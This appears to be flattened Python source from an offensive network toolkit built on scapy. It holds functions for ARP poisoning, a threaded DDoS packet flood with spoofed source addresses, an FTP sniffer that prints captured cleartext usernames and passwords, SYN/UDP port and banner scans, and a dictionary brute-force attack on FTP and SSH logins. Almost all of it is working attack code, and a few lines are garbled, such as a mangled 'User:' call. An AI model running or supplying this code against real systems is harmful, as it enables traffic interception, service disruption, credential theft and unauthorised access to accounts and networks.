def _arp_poison(gateway_ip, gateway_mac, target_ip, target_mac): menu_utils.super_highlighted_info("\nARP poison attack is ACTIVE [CTRL-C to stop]") while continue_poison: send(ARP(op=2, pdst=gateway_ip, hwdst=gateway_mac, psrc=target_ip), verbose=False) send(ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=gateway_ip), verbose=False) time.sleep(5) menu_utils.highlighted_info("ARP poison thread released")
def ddos_attack(attackers_ips, ips, ports, duration): menu_utils.header('DDoS attack, target IPs: %s ' % ips) menu_utils.mixed_info("Attackers IPs: ", attackers_ips) menu_utils.mixed_info("Ports: ", ports) menu_utils.mixed_info("Duration: ", "%s seconds" % duration) menu_utils.highlighted_info("Progress:\n") t0 = time.time() pkt_counter = 0 thread_list = [] while time.time() < (t0 + duration): chosen_attacker_ip = random.choice(attackers_ips) chosen_ip = random.choice(ips) chosen_port = random.choice(ports) t = threading.Thread(target=_send_packet, args=(chosen_attacker_ip, chosen_ip, chosen_port,)) t.start() thread_list.append(t) if pkt_counter % config_params.MAX_NUMBER_THREADS == 0: for thread in thread_list: thread.join() # closing threads thread_list = [] pkt_counter += 1 additional_info = "attack: %s -> %s:%s" % (chosen_attacker_ip, chosen_ip, chosen_port) menu_utils.progress_bar(int(100*(time.time() - t0)/duration), config_params.DISPLAY["progress_bar_width"], additional_info) menu_utils.super_highlighted_info("\n%s DDoS packets successfully sent" % pkt_counter)
def _target_passwd_sniffer(pkt): if pkt.haslayer(TCP) and pkt.haslayer(Raw): if pkt[TCP].dport == plain_ports[0] or pkt[TCP].sport == plain_ports[0]: data = str(pkt[Raw]) if 'USER' in data and '530' not in data: ftp_user = data.split('USER')[1][:-5] # [:-5] to remove \r\n' from the user print("%s -> %s: FTP user: %s" % (pkt[IP].src, pkt[IP].dst, ftp_user)) elif 'PASS' in data and '530' not in data: ftp_pass = data.split('PASS')[1][:-5] # [:-5] to remove \r\n' from the password print("%s -> %s: FTP pass: %s" % (pkt[IP].src, pkt[IP].dst, ftp_pass)) elif '230 Login successful' in data: menu_utils.super_highlighted_info("%s -> %s: FTP login successful" % (pkt[IP].src, pkt[IP].dst)) elif '530 Login incorrect' in data: menu_utils.warning("%s -> %s: FTP login incorrect" % (pkt[IP].src, pkt[IP].dst))
def _tcp_scan(ip, port): """ This method performs TCP scans """ menu_utils.mixed_info("\nTCP scan: Analysing port: ", str(port)) response = sr1(IP(dst=ip) / TCP(dport=int(port), flags="S"), timeout=config_params.SCAPY_TIMEOUT) # Sending flag SYN print("Response type: " + str(type(response))) if str(type(response)) == "<class 'NoneType'>": menu_utils.warning("[-] Port %s closed" % port) return "CLOSED" elif response.haslayer(TCP): if response.getlayer( TCP).flags == 0x12: # Receiving flags ACK + SYN (00010010b) menu_utils.super_highlighted_info("[+] Port %s open" % port) return "OPEN" elif response.haslayer(ICMP): if response.getlayer(TCP).flags == 0x14: menu_utils.warning("[-] Port %s closed" % port) # Receiving flags ACK + RST (00010100b) return "CLOSED" else: return "UNKNOWN"
def _banner_scan(ip, port): """ Method to obtain the banner corresponding to the port of the IP """ category = "" banner = "" try: menu_utils.mixed_info("\nBanner grab: Analysing port: ", str(port)) connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((ip, port)) connection.setblocking(False) ready = select.select([connection], [], [], config_params.BANNER_TIMEOUT) if ready[0]: banner = connection.recv(4096) print("Banner: " + str(banner)) f = open(config_params.VULNERABLE_BANNERS, 'r') category = "NON-VULNERABLE" for banner_vulnerable in f: if str(banner_vulnerable).strip() in str(banner).strip(): category = "VULNERABLE" break if category == "VULNERABLE": menu_utils.super_highlighted_info('[+] The banner is vulnerable') else: menu_utils.highlighted_info('[?] The banner seems NOT vulnerable') else: menu_utils.warning('[-] The banner is not available') category = "UNAVAILABLE" except (ConnectionRefusedError, FileNotFoundError, TimeoutError) as e: menu_utils.error(e) category = "UNAVAILABLE" return category, banner
def _udp_scan(ip, port): """ This method performs UDP scans """ menu_utils.mixed_info("\nUDP scan: Analysing port: ", str(port)) response = sr1(IP(dst=ip) / UDP(dport=int(port)), timeout=config_params.SCAPY_TIMEOUT) print("Response type: " + str(type(response))) if str(type(response)) == "<class 'NoneType'>": menu_utils.highlighted_info("[?] Port %s open or filtered" % port) return "OPEN|FILTERED" elif response.haslayer(UDP): menu_utils.super_highlighted_info("[+] Port % open" % port) return "OPEN" elif response.haslayer(ICMP): if (int(response.getlayer(ICMP).type) == 3) & (int(response.getlayer(ICMP).code == 3)): menu_utils.warning("[-] Port %s closed" % port) return "CLOSED" elif (int(response.getlayer(ICMP).type) == 3) & (int( response.getlayer(ICMP).code) in [1, 2, 9, 10, 13]): menu_utils.warning("[x] Port %s filtered" % port) return "FILTERED" else: return "UNKNOWN"
def dictionary_attack(protocol, ip, port, interval, user, dictionary): if (protocol.lower() != 'ftp') & (protocol.lower() != 'ssh'): menu_utils.warning('Only "FTP" or "SSH" protocols are supported') return menu_utils.header('Brute force attack, target IP: %s ' % ip) menu_utils.mixed_info("Protocol:", protocol) menu_utils.mixed_info("Interval between attempts:", "%s milliseconds" % interval) menu_utils.mixed_info("User:"******"Dictionary:", dictionary) counter = 0 thread_list = [] passwords = file_utils.load_file_as_list(dictionary) print("%s passwords in the dictionary" % len(passwords)) menu_utils.highlighted_info("Progress:\n") my_queue = queue.Queue() if passwords: for passw in passwords: time.sleep(interval / 1000) counter += 1 additional_info = "Trying pass: %s" % passw menu_utils.progress_bar( int(100 * counter / len(passwords)), config_params.DISPLAY["progress_bar_width"], additional_info) if protocol.lower() == 'ftp': t = threading.Thread(target=_ftp_connection_attempt, args=( ip, port, user, passw, my_queue, )) elif protocol.lower() == 'ssh': t = threading.Thread(target=_ssh_connection_attempt, args=( ip, port, user, passw, my_queue, )) t.start() thread_list.append(t) if counter % config_params.MAX_NUMBER_THREADS == 0: for thread in thread_list: thread.join() # closing threads thread_list = [] if not my_queue.empty(): # the pass is stored in the queue break for thread in thread_list: thread.join() # closing threads if not my_queue.empty(): # the pass is stored in the queue menu_utils.super_highlighted_info("\n[+] Password found: %s" % my_queue.get()) else: menu_utils.warning("\n[-] Password not found in %s " % dictionary) else: menu_utils.warning("\n[-] %s dictionary not found " % dictionary)